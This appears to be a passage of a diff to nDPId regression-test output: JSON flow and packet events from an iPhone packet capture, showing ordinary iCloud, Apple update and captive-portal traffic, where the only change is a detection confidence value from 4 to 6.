00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1582454598418,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598418,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAG\/DfAqAIREf1pysWTAbsyJO8VAAAAALDC\/\/8V2QAAAgQFtAEDAwcBAQgKEd\/neQAAAAAEAgAA"} 
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"iphone.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1582454598426,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598426,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADIGSjwR\/WnKwKgCEQBQwACbtSzNLJXrMqBScNC85AAAAgQFrAQCCAodNCSFEd\/nTQEDAwg="} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1582454598427,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598427,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADIGslMRggIuwKgCEQG7xZHfrwWiGTrrGKBSqbCWRAAAAgQFrAQCCAq1T9HeEd\/nUwEDAw4="} -00945{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":78,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598377,"flow_last_seen":1582454598449,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598449,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.25.53","src_port":50576,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"gspe35-ssl.ls.apple.com","ja3":"55271a105172d5f225e4704755b9b250","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00945{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":78,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598377,"flow_last_seen":1582454598449,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598449,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.25.53","src_port":50576,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"gspe35-ssl.ls.apple.com","ja3":"55271a105172d5f225e4704755b9b250","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1582454598453,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598453,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADIGSjwR\/WnKwKgCEQG7xZNpWNRgMiTvFqBScNC35wAAAgQFrAQCCAoAH8DDEd\/neQEDAwg="} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1582454598459,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598459,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADIGSjwR\/WnKwKgCEQG7xZLy+qnpfzqpjaBScNDegAAAAgQFrAQCCAqK\/qiVEd\/ndwEDAwg="} 
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"iphone.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598542,"flow_last_seen":1582454598542,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1582454598542,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52852,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"iphone.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1582454598542,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598542,"pkt":"xiwDYGpkxGGLNYKpCABFAABAIN8AAP8RFWvAqAIRwKgCAc50ADUALLvssQ8BAAABAAAAAAAAB2dhdGV3YXkGaWNsb3VkA2NvbQAAAQAB"} -00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":85,"source":"iphone.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598542,"flow_last_seen":1582454598542,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1582454598542,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52852,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"gateway.icloud.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":85,"source":"iphone.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598542,"flow_last_seen":1582454598542,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1582454598542,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52852,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"gateway.icloud.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"iphone.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1582454598544,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598544,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAG\/EPAqAIREf1pysAAAFAslesym7UszoAQCBZUCQAAAQEIChHf5+gdNCSF"} -00809{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"iphone.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598387,"flow_last_seen":1582454598545,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":131,"flow_tot_l4_payload_len":131,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454598545,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":49152,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Apple","breed":"Safe","category":"ConnCheck"},"http": 
{"hostname":"captive.apple.com","url":"captive.apple.com\/hotspot-detect.html","code":0,"content_type":"","user_agent":"CaptiveNetworkSupport-390.60.1 wispr"}} +00809{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"iphone.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598387,"flow_last_seen":1582454598545,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":131,"flow_tot_l4_payload_len":131,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454598545,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":49152,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Apple","breed":"Safe","category":"ConnCheck"},"http": {"hostname":"captive.apple.com","url":"captive.apple.com\/hotspot-detect.html","code":0,"content_type":"","user_agent":"CaptiveNetworkSupport-390.60.1 wispr"}} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1582454598545,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598545,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGZFvAqAIREYICLsWRAbsZOusY368Fo4AQBAtqWAAAAQEIChHf5\/C1T9He"} 
-00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598385,"flow_last_seen":1582454598545,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598545,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.130.2.46","src_port":50577,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsp85-ssl.ls.apple.com","ja3":"55271a105172d5f225e4704755b9b250","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598385,"flow_last_seen":1582454598545,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598545,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.130.2.46","src_port":50577,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gsp85-ssl.ls.apple.com","ja3":"55271a105172d5f225e4704755b9b250","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1582454598546,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598546,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAG\/EPAqAIREf1pysWTAbsyJO8WaVjUYYAQBAtTNAAAAQEIChHf5\/cAH8DD"} -00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":96,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598418,"flow_last_seen":1582454598546,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598546,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50579,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mesu.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":96,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598418,"flow_last_seen":1582454598546,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598546,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50579,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mesu.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1582454598546,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598546,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAG\/EPAqAIREf1pysWSAbt\/OqmN8vqp6oAQBAt5ywAAAQEIChHf5\/eK\/qiV"} -00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":98,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598416,"flow_last_seen":1582454598546,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598546,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50578,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mesu.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00978{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":102,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598252,"flow_last_seen":1582454598558,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598558,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.140","src_port":50575,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-fmfmobile.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -03152{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":106,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1582454598252,"flow_last_seen":1582454598568,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6277,"flow_avg_l4_payload_len":627,"midstream":0,"thread_ts_msec":1582454598568,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.140","src_port":50575,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"p26-fmfmobile.icloud.com","server_names":"p67-fmfmobile.icloud.com,p48-fmfmobile.icloud.com,p53-fmfmobile.icloud.com,p34-fmfmobile.icloud.com,p72-fmfmobile.icloud.com,fmfmobile.icloud.com,p08-fmfmobile.icloud.com,p12-fmfmobile.icloud.com,p02-fmfmobile.icloud.com,p29-fmfmobile.icloud.com,p52-fmfmobile.icloud.com,p26-fmfmobile.icloud.com,p06-fmfmobile.icloud.com,p97-fmfmobile.icloud.com,p41-fmfmobile.icloud.com,p40-fmfmobile.icloud.com,p18-fmfmobile.icloud.com,p55-fmfmobile.icloud.com,p70-fmfmobile.icloud.com,p32-fmfmobile.icloud.com,p69-fmfmobile.icloud.com,p17-fmfmobile.icloud.com,p13-fmfmobile.icloud.com,p38-fmfmobile.icloud.com,p11-fmfmobile.icloud.com,p21-fmfmobile.icloud.com,p27-fmfmobile.icloud.com,p42-fmfmobile.icloud.com,p37-fmfmobile.icloud.com,p56-fmfmobile.icloud.com,p50-fmfmobile.icloud.com,p58-fmfmobile.icloud.com,p39-fmfmobile.icloud.com,p45-fmfmobile.icloud.com,p49-fmfmobile.icloud.com,p68-fmfmobile.icloud.com,p10-fmfmobile.icloud.com,p22-fmfmobile.icloud.com,p07-fmfmobile.icloud.com,p25-fmfmobile.icloud.com,p20-fmfmobile.icloud.com,p71-fmfmobile.icloud.com,p05-fmfmobile.icloud.com,p98-fmfmobile.icloud.com,p66-fmfmobile.icloud.com,p15-fmfmobile.icloud.com,p16-fmfmobile.icloud.com,p44-fmfmobile.icloud.com,p04-fmfmobile.icloud.com,p09-fmfmobile.icloud.com,p23-fmfmobile.icloud.com,p61-fmfmobile.icloud.com,p30-fmfmobile.icloud.com,p46-fmfmobile.icloud.com,p60-fmfmobile.icloud.com,p43-fmfmobile.icloud.com,p57-fmfmobile.icloud.com,p14-fmfmobile.icloud.com,p03-fmfmobile.icloud.com,p36-fmfmobile.icloud.com,p64-fmfmobile.icloud.com,p28-fmfmobile.icloud.com,p24-fmfmobile.icloud.com,p202-fmfmobile.icloud.com,p01-fmfmobile.icloud.com,p62-fmfmobile.icloud.com,p47-fmfmobile.icloud.com,p35-fmfmobile.icloud.com,p65-fmfmobile.icloud.com,p31-fmfmobile.icloud.com,p63-fmfmobile.icloud.com,p19-fmfmobile.icloud.com,p33-fmfmobile.icloud.com,p51-fmfmobile.icloud.com,p54-fmfmobile.icloud.com,p59-fmfmobile.icloud.com,p201-fmf
mobile.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=fmfmobile.icloud.com, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"FF:C3:9F:1A:A1:3C:D2:3C:06:96:EC:49:B4:97:A9:D3:DA:05:A3:E2"}} +00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":98,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598416,"flow_last_seen":1582454598546,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598546,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50578,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mesu.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00978{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":102,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598252,"flow_last_seen":1582454598558,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598558,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.140","src_port":50575,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-fmfmobile.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +03152{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":106,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1582454598252,"flow_last_seen":1582454598568,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6277,"flow_avg_l4_payload_len":627,"midstream":0,"thread_ts_msec":1582454598568,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.140","src_port":50575,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"p26-fmfmobile.icloud.com","server_names":"p67-fmfmobile.icloud.com,p48-fmfmobile.icloud.com,p53-fmfmobile.icloud.com,p34-fmfmobile.icloud.com,p72-fmfmobile.icloud.com,fmfmobile.icloud.com,p08-fmfmobile.icloud.com,p12-fmfmobile.icloud.com,p02-fmfmobile.icloud.com,p29-fmfmobile.icloud.com,p52-fmfmobile.icloud.com,p26-fmfmobile.icloud.com,p06-fmfmobile.icloud.com,p97-fmfmobile.icloud.com,p41-fmfmobile.icloud.com,p40-fmfmobile.icloud.com,p18-fmfmobile.icloud.com,p55-fmfmobile.icloud.com,p70-fmfmobile.icloud.com,p32-fmfmobile.icloud.com,p69-fmfmobile.icloud.com,p17-fmfmobile.icloud.com,p13-fmfmobile.icloud.com,p38-fmfmobile.icloud.com,p11-fmfmobile.icloud.com,p21-fmfmobile.icloud.com,p27-fmfmobile.icloud.com,p42-fmfmobile.icloud.com,p37-fmfmobile.icloud.com,p56-fmfmobile.icloud.com,p50-fmfmobile.icloud.com,p58-fmfmobile.icloud.com,p39-fmfmobile.icloud.com,p45-fmfmobile.icloud.com,p49-fmfmobile.icloud.com,p68-fmfmobile.icloud.com,p10-fmfmobile.icloud.com,p22-fmfmobile.icloud.com,p07-fmfmobile.icloud.com,p25-fmfmobile.icloud.com,p20-fmfmobile.icloud.com,p71-fmfmobile.icloud.com,p05-fmfmobile.icloud.com,p98-fmfmobile.icloud.com,p66-fmfmobile.icloud.com,p15-fmfmobile.icloud.com,p16-fmfmobile.icloud.com,p44-fmfmobile.icloud.com,p04-fmfmobile.icloud.com,p09-fmfmobile.icloud.com,p23-fmfmobile.icloud.com,p61-fmfmobile.icloud.com,p30-fmfmobile.icloud.com,p46-fmfmobile.icloud.com,p60-fmfmobile.icloud.com,p43-fmfmobile.icloud.com,p57-fmfmobile.icloud.com,p14-fmfmobile.icloud.com,p03-fmfmobile.icloud.com,p36-fmfmobile.icloud.com,p64-fmfmobile.icloud.com,p28-fmfmobile.icloud.com,p24-fmfmobile.icloud.com,p202-fmfmobile.icloud.com,p01-fmfmobile.icloud.com,p62-fmfmobile.icloud.com,p47-fmfmobile.icloud.com,p35-fmfmobile.icloud.com,p65-fmfmobile.icloud.com,p31-fmfmobile.icloud.com,p63-fmfmobile.icloud.com,p19-fmfmobile.icloud.com,p33-fmfmobile.icloud.com,p51-fmfmobile.icloud.com,p54-fmfmobile.icloud.com,p59-fmfmobile.icloud.com,p201-fmf
mobile.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=fmfmobile.icloud.com, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"FF:C3:9F:1A:A1:3C:D2:3C:06:96:EC:49:B4:97:A9:D3:DA:05:A3:E2"}} 00708{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":110,"source":"iphone.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1582454598582,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":244,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":244,"pkt_l4_len":210,"thread_ts_msec":1582454598582,"pkt":"xGGLNYKpxiwDYGpkCABFAADmpdwAAEARTsjAqAIBwKgCEQA1znQA0sdAsQ+BgAABAAkAAAAAB2dhdGV3YXkGaWNsb3VkA2NvbQAAAQABwAwABQABAAARlgAaB2dhdGV3YXkCZmUJYXBwbGUtZG5zA25ldADAMAABAAEAAAAiAAQR+LBLwDAAAQABAAAAIgAEEfixhcAwAAEAAQAAACIABBH4sCjAMAABAAEAAAAiAAQR+LCNwDAAAQABAAAAIgAEEfiwTcAwAAEAAQAAACIABBH4sWXAMAABAAEAAAAiAAQR+LGqwDAAAQABAAAAIgAEEfiwiQ=="} -00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":110,"source":"iphone.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598542,"flow_last_seen":1582454598582,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1582454598582,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52852,"dst_port":53,"l4_proto":"udp","ndpi": 